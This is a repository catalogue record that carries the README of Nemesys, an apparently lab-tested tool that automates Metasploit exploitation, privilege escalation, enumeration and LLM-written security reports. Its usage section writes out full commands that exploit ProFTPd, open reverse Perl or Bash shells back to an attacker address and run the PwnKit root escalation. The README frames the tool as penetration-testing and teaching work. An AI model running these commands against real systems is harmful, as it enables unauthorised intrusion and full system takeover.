{"id":22957956,"url":"https://github.com/sergio11/nemesys","last_synced_at":"2025-04-02T01:51:51.382Z","repository":{"id":90143633,"uuid":"54279115","full_name":"sergio11/nemesys","owner":"sergio11","description":"Nemesys is an ethical cybersecurity tool designed to automate exploitation and post-exploitation tasks using Metasploit. It enhances target attacks, privilege escalation, and system analysis while providing intelligent reporting through cloud-based large language models (LLMs). πŸš€πŸ“Š","archived":false,"fork":false,"pushed_at":"2025-03-19T17:30:38.000Z","size":4392,"stargazers_count":10,"open_issues_count":0,"forks_count":1,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-19T18:33:46.874Z","etag":null,"topics":["ai-security","cybersecurity","exploit-framework","faiss","faiss-cpu","faiss-vector-database","groq","groq-api","hacking-tools","langchain","metasploit","penetration-testing","post-exploitation","privilege-escalation","python","security-analysis","system-enumeration","vulnerability-assessment","vulnerability-detection"],"latest_commit_sha":null,"homepage":"https://sanchezsanchezsergio418.medium.com/harnessing-generative-ai-for-post-exploitation-vulnerability-reporting-in-cybersecurity-a-5ba3e53958ec","language":"Python","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sergio11.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-03-19T17:45:00.000Z","updated_at":"2025-03-19T17:30:42.000Z","dependencies_parsed_at":null,"dependency_job_id":"d5458819-5a7e-4fa1-85cc-b13e596e95bb","html_url":"https://github.com/sergio11/nemesys","commit_stats":null,"previous_names":["sergio11/nemesys"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sergio11%2Fnemesys","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sergio11%2Fnemesys/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sergio11%2Fnemesys/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sergio11%2Fnemesys/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sergio11","download_url":"https://codeload.github.com/sergio11/nemesys/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246741185,"owners_count":20826063,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ai-security","cybersecurity","exploit-framework","faiss","faiss-cpu","faiss-vector-database","groq","groq-api","hacking-tools","langchain","metasploit","penetration-testing","post-exploitation","privilege-escalation","python","security-analysis","system-enumeration","vulnerability-assessment","vulnerability-detection"],"created_at":"2024-12-14T17:33:54.308Z","updated_at":"2025-04-02T01:51:51.372Z","avatar_url":"https://github.com/sergio11.png","language":"Python","readme":"# πŸ’€ **Nemesys**: ⚑ Critical Data Harvesting \u0026 πŸ› οΈ Post-Exploitation Tool πŸ•΅οΈβ€β™‚οΈ\n\n**Nemesys** is an advanced exploitation and post-exploitation automation tool built on top of the Metasploit Framework. πŸ› οΈ Designed for penetration testers and security researchers, it streamlines the process of targeting, exploiting, and deeply enumerating vulnerable systems. With a sleek dark-themed interface and powerful automation, **Nemesys** simplifies complex exploitation workflows, providing full control and visibility over compromised systems. βš”οΈ\n\nβš”οΈ **Nemesys** empowers professionals to improve their security posture by delivering comprehensive reports on vulnerabilities, insecure configurations, and potential risks, all generated automatically for enhanced efficiency and accuracy.\n\nπŸ™ I would like to express my sincere gratitude to [Santiago HernΓ‘ndez, a leading expert in Cybersecurity and Artificial Intelligence](https://www.udemy.com/user/shramos/). His outstanding course on **Cybersecurity and Ethical Hacking**, available on Udemy, was instrumental in the development of this project. The insights and techniques I gained from his course were invaluable in guiding my approach to cybersecurity practices. Thank you for sharing your knowledge and expertise!\n\n\n### Testing Information πŸ§ͺ\nAll tests and exploitation workflows in **Nemesys** were conducted in a controlled environment using **Metasploitable Ubuntu**, a deliberately vulnerable machine designed for security testing and training. This testing was carried out in a dedicated **lab environment** to ensure ethical use and avoid unauthorized access to any external systems. The results of these tests demonstrate the tool’s effectiveness in identifying and exploiting vulnerabilities in a controlled, safe, and legal environment.\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"https://img.shields.io/badge/langchain-1C3C3C?style=for-the-badge\u0026logo=langchain\u0026logoColor=white\" /\u003e\n \u003cimg src=\"https://img.shields.io/badge/Kali_Linux-557C94?style=for-the-badge\u0026logo=kali-linux\u0026logoColor=white\" /\u003e\n \u003cimg src=\"https://img.shields.io/badge/Python-FFD43B?style=for-the-badge\u0026logo=python\u0026logoColor=blue\" /\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_1.PNG\" /\u003e\n\u003c/p\u003e\n\n## ⚠️ Disclaimer \n\n**Nemesys** has been developed **solely for educational and research purposes** as part of my learning process in **cybersecurity, pentesting, and post-exploitation automation**. This project was created to **practice the knowledge acquired during a cybersecurity course**, experiment with advanced techniques in a **controlled lab environment**, and add it to my **portfolio of cybersecurity projects**. \n\nThis tool is designed **exclusively for ethical hacking and authorized security assessments**. Its use **must be strictly limited to environments where explicit permission has been granted**, such as testing labs, cybersecurity training, or approved security audits. \n\n**Unauthorized use of this tool on external systems is strictly prohibited** and may violate laws. \n\n**I disclaim any responsibility for improper use of this tool.** **Always act within legal and ethical boundaries, and obtain proper authorization before conducting any security testing.**\n\nAll tests and exploitation workflows in **Nemesys** were conducted in a controlled environment using **Metasploitable Ubuntu**, a deliberately vulnerable machine designed for security testing and training. This testing was carried out in a dedicated **lab environment** to ensure ethical use and avoid unauthorized access to any external systems. The results of these tests demonstrate the tool’s effectiveness in identifying and exploiting vulnerabilities in a controlled, safe, and legal environment.\n\n## More Details πŸ“\n\nFor comprehensive information about this project, check out this [Medium article](https://sanchezsanchezsergio418.medium.com/harnessing-generative-ai-for-post-exploitation-vulnerability-reporting-in-cybersecurity-a-5ba3e53958ec).\n\n## 🌟 **Explore My Other Open-Source Ethical Hacking Tools**\n\nIf you're passionate about ethical hacking and want to elevate your cybersecurity toolkit, make sure to explore my suite of open-source projects. These tools are designed to empower penetration testers and cybersecurity professionals by streamlining complex tasks, enhancing security audits, and uncovering vulnerabilities with cutting-edge precision:\n\n- [πŸ¦… **NetHawk**](https://github.com/sergio11/nethawk_analyzer): A state-of-the-art **AI-powered ethical hacking tool** for **network vulnerability assessment**. Using advanced frameworks like **Scapy** and **Nmap**, NetHawk automates **port scanning**, **vulnerability detection**, and **report generation**, making security audits faster, smarter, and more efficient. Whether you're a **network administrator**, **cybersecurity expert**, or **ethical hacker**, NetHawk simplifies the assessment process and offers actionable insights to fortify your systems.\n- [πŸ’€ **Nemesys**](https://github.com/sergio11/nemesys): An advanced **exploitation** and **post-exploitation** tool built on top of the **Metasploit Framework** for automating critical data harvesting and system enumeration. \n- [πŸ•·οΈ **BlackVenom**](https://github.com/sergio11/blackvenom): The ultimate **ARP** and **DNS spoofing** tool for **intercepting network traffic** and uncovering vulnerabilities with stealth and precision. \n- [🌐 **ZeroTrace**](https://github.com/sergio11/zero_trace_hacking_tool): A powerful **search engine dorking** tool designed to identify **attack vectors** and uncover **exposed sensitive information** across the web.\n- πŸ” **DecryptX**: An **advanced hash and password security assessment tool** that empowers you to analyze **password hashes**, **encrypted ZIP files**, and more. Ideal for evaluating the strength of encryption and identifying weaknesses in **security implementations**.\n- [ πŸŒ‘ **EclipseRecon**](https://github.com/sergio11/eclipserecon): is a stealthy web reconnaissance tool for uncovering hidden vulnerabilities, subdomains, and site structures. πŸ•΅οΈβ€β™‚οΈπŸ” It empowers security professionals to identify critical attack surfaces with precision, ensuring proactive defense. πŸš¨πŸ’»\n- [ 🌐 **ZoneGuardian**](https://github.com/sergio11/zoneguardian): A powerful tool to analyze DNS configurations, detect vulnerabilities, and generate actionable security reports. πŸ”’πŸš€ Safeguard your digital assets with precision and ease!\n- **Retrospect**: A cutting-edge **reconnaissance and security analysis tool** that retrieves and analyzes historical web snapshots, helping you uncover past vulnerabilities and misconfigurations before they can be exploited today. Ideal for **ethical hackers** and **digital forensics experts**.\n\nThese tools are designed to streamline penetration testing, enhance security assessments, and provide in-depth insights into vulnerabilities. Explore them to level up your ethical hacking skills! πŸ’»πŸ”\n\n## πŸš€βœ¨ Key Features\n\n- πŸ” **Automated Exploitation**: Execute Metasploit exploits effortlessly against target systems. Choose your desired exploit and payload, and let Nemesys automate the execution, session creation, and follow-up tasks.\n- πŸ›‘οΈ **Privilege Escalation**: Gain elevated access by leveraging built-in Metasploit modules for privilege escalation, enabling root or administrative control over the target system.\n- ⬆️ **Session Upgrade to Meterpreter**: Automatically upgrades simple shell sessions to fully interactive Meterpreter sessions, unlocking additional post-exploitation capabilities such as file system browsing, keylogging, and pivoting.\n- πŸ’» **Interactive Reverse Shell**: Establishes an interactive reverse shell with root or elevated privileges, enabling direct manual exploitation and in-depth system analysis.\n- πŸ—‚οΈ **System Critical Harvesting**: Conducts comprehensive system enumeration and data harvesting, extracting key details such as OS version, kernel information, network configuration, active processes, and user permissions.\n- 🧠 **Intelligent Reporting with LLMs**: Utilizes **LangChain** integrated with **Groq** for cloud-based LLM processing. Generates a detailed analysis of the target system, including insights on potential next steps, vulnerability assessment, and remediation recommendations.\n- πŸ€– **Integration with Metasploit RPC**: Direct connection to Metasploit’s RPC interface allows efficient management of active sessions, payloads, and exploit modules, optimizing the post-exploitation workflow.\n- πŸ› οΈ **User-Friendly and Extensible**: Built with an intuitive interface for streamlined usage. Easily customizable to fit specific exploitation scenarios and to integrate with other tools in your security arsenal.\n\n\n## πŸ”§πŸ’» Requirements\n\n- 🐍 **Python 3.8+**: Required for running the Nemesys scripts.\n- 🦾 **Metasploit Framework**: Installed and configured for exploit execution.\n- ☁️ **LangChain** and **Groq**: Access for cloud-based LLM processing with Groq's powerful AI model.\n- πŸ”‘ **Root or Admin Privileges**: Necessary for full functionality and executing privileged exploits.\n- 🧠 **FAISS**: Set up for efficient similarity search and retrieval in the RAG (Retrieval-Augmented Generation) process.\n- πŸ€— **HuggingFaceEmbeddings**: Required for embedding documents and enhancing the RAG technique for optimal security analysis.\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_3.PNG\" /\u003e\n\u003c/p\u003e\n\n## πŸ”§πŸ§© **Component Breakdown**: πŸ” Exploring the Building Blocks of Nemesys βš™οΈ\n\nNemesys is designed with a modular architecture, where each component has a distinct responsibility, making the exploitation and post-exploitation process efficient and streamlined. Below is a detailed overview of each core component:\n\n### 1. **MetasploitClient** πŸ•΅οΈβ€β™‚οΈ\n\nThe **MetasploitClient** serves as the connection interface between Nemesys and the Metasploit RPC API.\n\n- **Responsibilities**:\n - Establishes and manages the connection to the Metasploit RPC server.\n - Handles secure API requests with SSL support.\n - Provides a client object used by other components for unified Metasploit interactions.\n\n- **Integration**:\n - Initiated during the setup of Nemesys to validate connectivity.\n - Essential for all interactions with Metasploit modules across components.\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_4.PNG\" /\u003e\n\u003c/p\u003e\n\n### 2. **ExploitManager** πŸ’₯\n\nThe **ExploitManager** handles the execution of exploits against target systems using Metasploit.\n\n- **Responsibilities**:\n - Executes chosen exploit modules with specified payloads.\n - Configures options for both exploit and payload modules (e.g., `RHOSTS`, `LPORT`).\n - Tracks exploit attempts using UUIDs for result monitoring.\n\n- **Integration**:\n - Triggered by the `run_attack()` method to start the exploitation phase.\n - Passes exploit UUIDs to the **SessionManager** for session tracking.\n\n### 3. **SessionManager** πŸ”„\n\nThe **SessionManager** is in charge of managing sessions, including session upgrades and tracking active sessions.\n\n- **Responsibilities**:\n - Retrieves session IDs based on the exploit UUID returned by the **ExploitManager**.\n - Upgrades standard shell sessions to Meterpreter sessions for enhanced capabilities.\n - Lists and manages active sessions for efficient exploitation.\n\n- **Integration**:\n - Central to the transition between the exploitation and post-exploitation phases.\n - Handles session upgrades automatically and tracks session IDs.\n\n### 4. **PrivilegeEscalationManager** πŸ”“\n\nThe **PrivilegeEscalationManager** focuses on elevating privileges after a session has been established.\n\n- **Responsibilities**:\n - Identifies suitable privilege escalation exploits based on system information.\n - Executes privilege escalation modules (e.g., kernel exploits) to gain elevated access.\n - Verifies the success of privilege escalation attempts.\n\n- **Integration**:\n - Optionally invoked in the `run_attack()` method if a privilege escalation module is specified.\n - Collaborates with the **SystemEnumerator** to determine potential escalation paths.\n\n### 5. **ShellInterface** πŸ–₯️\n\nThe **ShellInterface** provides an interactive shell for direct command execution on compromised targets.\n\n- **Responsibilities**:\n - Opens an interactive shell session (Meterpreter or standard shell) for manual exploitation.\n - Supports system command execution, script imports, and file transfers.\n - Offers a user-friendly interface for further post-exploitation tasks.\n\n- **Integration**:\n - Invoked at the end of the `run_attack()` process for hands-on interaction with the compromised system.\n - Adjusts the shell type based on the session capabilities (e.g., upgraded Meterpreter session).\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_5.PNG\" /\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_6.PNG\" /\u003e\n\u003c/p\u003e\n\n\n### 6. **SystemEnumerator** πŸ”\n\nThe **SystemEnumerator** is designed to gather extensive information about the compromised system for analysis.\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_7.PNG\" /\u003e\n\u003c/p\u003e\n\n- **Responsibilities**:\n - Collects system details such as OS version, network interfaces, installed software, and running processes.\n - Identifies potential vulnerabilities and misconfigurations using integrated tools like `searchsploit`.\n - Generates initial system assessment reports, aiding in further exploitation decisions.\n\n- **Integration**:\n - Called after session establishment and upgrade to provide critical system information.\n - Supplies data to the **PrivilegeEscalationManager** for identifying privilege escalation opportunities.\n - Capable of generating advanced reports using **LangChain** with LLM analysis through Groq Cloud.\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_8.PNG\" /\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_9.PNG\" /\u003e\n\u003c/p\u003e\n\n\n### 7. **SecurityAnalyzer** πŸ›‘οΈ\n\nThe **SecurityAnalyzer** component is responsible for analyzing the system enumeration log and generating comprehensive security reports using advanced AI techniques.\n\n- **Responsibilities**:\n - **Log Analysis**: The **SecurityAnalyzer** processes system enumeration logs received from the **SystemEnumerator** or another log source.\n - **Retrieval-Augmented Generation (RAG)**: Uses **FAISS** for document retrieval and **HuggingFaceEmbeddings** for embedding the logs, allowing the AI model to generate insights based on the retrieved information.\n - **Report Generation**: Creates professional security reports summarizing vulnerabilities, misconfigurations, and providing actionable recommendations.\n - **Format Generation**: Outputs reports in both **PDF** and **JSON** formats, making the insights accessible for both human review and further automation.\n\n- **Integration**:\n - Invoked after the **SystemEnumerator** process to analyze the system log and generate security reports based on the collected data.\n - Leverages the AI model in **LangChain** via **Groq Cloud** for processing and generating tailored security insights.\n - Plays a crucial role in the final analysis phase by providing detailed and actionable recommendations for improving the security posture of the target system.\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_10.PNG\" /\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_11.PNG\" /\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n \u003cimg src=\"doc/screenshots/picture_12.PNG\" /\u003e\n\u003c/p\u003e\n\nThis modular structure ensures that each component performs its role effectively, contributing to a cohesive and efficient exploitation workflow in Nemesys.\n\n## 🧩 Workflow Overview\n\nThe main exploitation process in Nemesys involves the following steps:\n\n1. **Initialization**:\n - Connects to Metasploit using **MetasploitClient** to establish a secure connection to the RPC server.\n\n2. **Exploitation**:\n - Executes the chosen exploit and payload using **ExploitManager**.\n - Retrieves the session ID via **SessionManager** to track exploit progress.\n\n3. **Session Management**:\n - Upgrades the session for enhanced control (e.g., Meterpreter shell) using **SessionManager**.\n\n4. **Privilege Escalation** (Optional):\n - Attempts privilege escalation using **PrivilegeEscalationManager** to gain higher-level access.\n\n5. **System Enumeration**:\n - Gathers extensive system information (OS details, running services, vulnerabilities) using **SystemEnumerator**.\n - The **SystemEnumerator** outputs logs with system data that can later be analyzed.\n\n6. **Security Analysis**:\n - The generated system enumeration log is fed into the **SecurityAnalyzer**.\n - **SecurityAnalyzer** uses advanced techniques (RAG with **FAISS** and **HuggingFaceEmbeddings**) to process the log and generate a detailed security report.\n\n7. **Interactive Shell**:\n - Provides a hands-on interactive shell through **ShellInterface** for manual exploitation, based on the elevated session or analysis results.\n\n## Installation βš™οΈ\nTo use Nemesys, you'll need to have the necessary dependencies installed and be able to run the Python script from your terminal.\n\nClone the repository to your machine:\n\n```bash\ngit clone https://github.com/sergio11/nemesys.git\n```\n\nNavigate to the directory:\n\n```bash\ncd nemesys\n```\nInstall dependencies:\n\n```bash\npip install -r requirements.txt\n```\n\n## Usage Examples πŸš€\n\nOnce everything is set up, you can invoke the **Nemesys** tool using the `nemesys_cli.py` script. Below are several examples of how to use it, along with explanations.\n\n### 1. Basic Exploit Invocation πŸ’₯\n\nThis command runs an exploit with a specific payload and sets up reverse connections for the exploit to work.\n\n```bash\nsudo $HOME/Desktop/Nemesys-Kali/bin/python nemesys_cli.py \\\n --password \"password\" \\\n --exploit_name \"unix/ftp/proftpd_modcopy_exec\" \\\n --payload_name \"cmd/unix/reverse_perl\" \\\n --rhosts \"192.168.11.128\" \\\n --sitepath \"/var/www/html\" \\\n --lhost \"192.168.11.129\" \\\n --lport 4445 \\\n --privilege_exploit \"linux/local/cve_2021_4034_pwnkit_lpe_pkexec\" \\\n --target \"192.168.11.128\"\n```\n\n#### Description πŸ“œ:\n- `--password \"password\"`: The password used for authentication on the target system. πŸ”‘\n- `--exploit_name \"unix/ftp/proftpd_modcopy_exec\"`: The specific exploit you want to run, targeting a vulnerability in ProFTPd. πŸ“‘\n- `--payload_name \"cmd/unix/reverse_perl\"`: The payload that will execute after the exploit is successful (reverse shell using Perl). πŸ–₯️\n- `--rhosts \"192.168.11.128\"`: The target machine's IP address for the exploit. 🎯\n- `--sitepath \"/var/www/html\"`: The path to the website directory (used in web-based exploits). 🌍\n- `--lhost \"192.168.11.129\"`: Your machine's IP address where the reverse shell will connect back. πŸ”™\n- `--lport 4445`: The local port on your machine that the reverse shell will connect to. βš™οΈ\n- `--privilege_exploit \"linux/local/cve_2021_4034_pwnkit_lpe_pkexec\"`: A local privilege escalation exploit to gain root access on the target. πŸ”“\n- `--target \"192.168.11.128\"`: The IP address of the target machine to attack. 🎯\n- `--log_file_path \"path_to_log_file\"`: The path to the system enumeration log file (default: `'system_enumeration.log'`). πŸ“„\n- `--pdf_path \"path_to_pdf_report\"`: The path to save the generated PDF report (default: `'nemesys_report.pdf'`). πŸ“‘\n- `--json_path \"path_to_json_report\"`: The path to save the generated JSON report (default: `'nemesys_report.json'`). πŸ“\n- `--verbose`: Enable verbose logging for detailed output (useful for troubleshooting and in-depth analysis). πŸ”\n\n#### Expected Outcome πŸ†:\nOnce you execute the command, **Nemesys** will attempt to exploit the ProFTPd vulnerability, trigger a reverse shell on your local machine, and then escalate privileges using the `pwnkit` local privilege escalation vulnerability.\n\n---\n\n### 2. Using a Different Payload 🚨\n\nTo use a different payload (e.g., `cmd/unix/reverse_bash`), simply modify the `--payload_name` parameter.\n\n```bash\nsudo $HOME/Desktop/Nemesys-Kali/bin/python nemesys_cli.py \\\n --password \"password\" \\\n --exploit_name \"unix/ftp/proftpd_modcopy_exec\" \\\n --payload_name \"cmd/unix/reverse_bash\" \\\n --rhosts \"192.168.11.128\" \\\n --sitepath \"/var/www/html\" \\\n --lhost \"192.168.11.129\" \\\n --lport 4445 \\\n --privilege_exploit \"linux/local/cve_2021_4034_pwnkit_lpe_pkexec\" \\\n --target \"192.168.11.128\"\n```\n\n#### Change Explained πŸ”„:\n- `--payload_name \"cmd/unix/reverse_bash\"`: Swapping the payload to a Bash reverse shell. πŸ’₯\n\n---\n\n### 3. Exploiting Without Privilege Escalation πŸ”“\n\nIf you don't need to perform privilege escalation, simply omit the `--privilege_exploit` parameter.\n\n```\nsudo $HOME/Desktop/Nemesys-Kali/bin/python nemesys_cli.py \\\n --password \"password\" \\\n --exploit_name \"unix/ftp/proftpd_modcopy_exec\" \\\n --payload_name \"cmd/unix/reverse_perl\" \\\n --rhosts \"192.168.11.128\" \\\n --sitepath \"/var/www/html\" \\\n --lhost \"192.168.11.129\" \\\n --lport 4445 \\\n --target \"192.168.11.128\"\n```\n\n#### What Happens? πŸ”\nThis command will perform the exploit and create a reverse shell without attempting to escalate privileges. It's useful when you only need a foothold without full system control. πŸ’₯\n\n### Important Notes\n\n- Make sure to replace `your_groq_api_key_here` and `your_model_id_here` in your `.env` file with your actual API key and model ID.\n- Ensure that the specified network range is appropriate for your nemesys setup.\n\n\n## ⚠️ Disclaimer \n\n**Nemesys** has been developed **solely for educational and research purposes** as part of my learning process in **cybersecurity, pentesting, and post-exploitation automation**. This project was created to **practice the knowledge acquired during a cybersecurity course**, experiment with advanced techniques in a **controlled lab environment**, and add it to my **portfolio of cybersecurity projects**. \n\nThis tool is designed **exclusively for ethical hacking and authorized security assessments**. Its use **must be strictly limited to environments where explicit permission has been granted**, such as testing labs, cybersecurity training, or approved security audits. \n\n**Unauthorized use of this tool on external systems is strictly prohibited** and may violate laws. \n\n**I disclaim any responsibility for improper use of this tool.** **Always act within legal and ethical boundaries, and obtain proper authorization before conducting any security testing.**\n\nAll tests and exploitation workflows in **Nemesys** were conducted in a controlled environment using **Metasploitable Ubuntu**, a deliberately vulnerable machine designed for security testing and training. This testing was carried out in a dedicated **lab environment** to ensure ethical use and avoid unauthorized access to any external systems. The results of these tests demonstrate the tool’s effectiveness in identifying and exploiting vulnerabilities in a controlled, safe, and legal environment.\n\n## Acknowledgements πŸ™\n\nπŸ™ I would like to express my sincere gratitude to [Santiago HernΓ‘ndez, a leading expert in Cybersecurity and Artificial Intelligence](https://www.udemy.com/user/shramos/). His outstanding course on **Cybersecurity and Ethical Hacking**, available on Udemy, was instrumental in the development of this project. The insights and techniques I gained from his course were invaluable in guiding my approach to cybersecurity practices. Thank you for sharing your knowledge and expertise!\n\n## 🀝 **Contributing**\nContributions to Nemesys are highly encouraged! If you're interested in adding new features, resolving bugs, or enhancing the project's functionality, please feel free to submit pull requests.\n\n## Get in Touch πŸ“¬\n\nNemesys is developed and maintained by **Sergio SΓ‘nchez SΓ‘nchez** (Dream Software). Special thanks to the open-source community and the contributors who have made this project possible. If you have any questions, feedback, or suggestions, feel free to reach out at [dreamsoftware92@gmail.com](mailto:dreamsoftware92@gmail.com).\n\n## Visitors Count\n\n\u003cimg width=\"auto\" src=\"https://profile-counter.glitch.me/nemesys/count.svg\" /\u003e\n \n ## Please Share \u0026 Star the repository to keep me motivated.\n \u003ca href = \"https://github.com/sergio11/nemesys/stargazers\"\u003e\n \u003cimg src = \"https://img.shields.io/github/stars/sergio11/nemesys\" /\u003e\n \u003c/a\u003e\n\n\n## License βš–οΈ\n\nThis project is licensed under the MIT License, an open-source software license that allows developers to freely use, copy, modify, and distribute the software. πŸ› οΈ This includes use in both personal and commercial projects, with the only requirement being that the original copyright notice is retained. πŸ“„\n\nPlease note the following limitations:\n\n- The software is provided \"as is\", without any warranties, express or implied. πŸš«πŸ›‘οΈ\n- If you distribute the software, whether in original or modified form, you must include the original copyright notice and license. πŸ“‘\n- The license allows for commercial use, but you cannot claim ownership over the software itself. 🏷️\n\nThe goal of this license is to maximize freedom for developers while maintaining recognition for the original creators.\n\n```\nMIT License\n\nCopyright (c) 2024 Dream software - Sergio SΓ‘nchez \n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n```\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsergio11%2Fnemesys","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsergio11%2Fnemesys","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsergio11%2Fnemesys/lists"}